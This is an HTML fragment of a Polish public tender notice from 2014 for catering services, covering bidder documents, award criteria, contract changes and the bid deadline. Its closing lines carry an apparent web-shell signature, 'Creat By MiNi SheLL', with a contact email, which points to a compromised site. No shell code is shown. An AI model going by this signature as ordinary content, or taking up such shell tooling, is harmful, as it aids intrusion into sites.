<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca powinien wykazać kolejno wszystkie usługi cateringowe żywienia  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, świadczył lub świadczy  usługi  wraz z podaniem ich wartości,  dat wykonania i podmiotów, na rzecz, których  usługi zostały wykonane lub są wykonywane, oraz załączy dowody, że usługi zostały wykonane lub są wykonywane należycie jak również nie nienależycie- z wykorzystaniem wzoru stanowiącego załącznik nr 3 do SIWZ.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-wykaz tych części zamówienia, których wykonanie Wykonawca zamierza zlecić podwykonawcy-wg załącznika nr 7 do SIWZ,
-pięć procesów technologicznych, o których mowa w dziale VII.pkt.Ad.1.2) SIWZ,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 75</li>
<li>2 - technologia przygotowania posiłków - 25</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiany w przepisach prawa lub wykładni jego przepisów; 
b). wystąpienia okoliczności (zdarzeń), na które strony umowy nie miały wpływu, 
a okoliczności (zdarzenia) te dotyczyły działania lub zaniechania: osób trzecich, organów, 
w stosunku do okoliczności towarzyszących zawarciu umowy, a wpływających obiektywnie, w sposób dalece utrudniający lub czyniący niemożliwym spełnienia świadczeń stron umowy,
c). zmiany wartości umowy - w przypadku zwiększenia bądź zmniejszenia stawek podatku od  towarów i usług, dotyczących przedmiotu zamówienia, w wyniku zmiany ustawy z dnia 11 marca 2004 roku o podatku od towarów i usług (Dz. U. z 2004 roku Nr 54, poz. 535 z późn. zm.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzol.cba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Aleja Ogrodowa 1
32-615 Grojec
Sekretariat PZOL w Grojcu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2014 godzina 10:00, miejsce: księgowość PZOL w Grojcu, Aleja Ogrodowa 1, 32-615 Grojec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com